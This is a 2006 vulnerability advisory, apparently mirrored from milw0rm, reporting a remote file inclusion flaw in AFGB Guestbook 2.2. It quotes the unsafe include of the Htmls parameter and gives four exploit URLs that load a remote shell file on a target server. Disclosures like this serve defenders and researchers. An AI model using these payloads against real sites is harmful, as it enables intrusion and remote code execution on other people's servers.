AFGB GUESTBOOK 2.2 (Htmls) Remote File Include Vulnerabilities

2006-10-13T00:00:00
ID SECURITYVULNS:DOC:14677
Type securityvulns
Reporter Securityvulns
Modified 2006-10-13T00:00:00

Description

afgb GUESTBOOK V2.2

Htmls Remote File Include Vulnerability

Turkish Hacker's

Discovered By : mdX

------------------------------------------------------

Cyber-Warrior TIM

Ay ve YIldIzlar Geceye YakISIr...

the moon and the stars suit the night

Class : REmote

File Code Detailed

File :add.php?,admin.php?,look.php?,re.php

Code :

include "$Htmls";

Exploit : http://www.target.***/[path]/add.php?Htmls=http://shell.txt?

Exploit : http://www.target.***/[path]/admin.php?Htmls=http://shell.txt?

Exploit : http://www.target.***/[path]/look.php?Htmls=http://shell.txt?

Exploit : http://www.target.***/[path]/re.php?Htmls=http://shell.txt?

ThankX

Cyber-warrior User ,PROHACK, Siber-korsanlar [redx, dipsomania, k.z.l_alev]

Shika, xoron , real_dark_boy, All Friends

download link :http://www.afgb.to/

milw0rm.com [2006-10-12]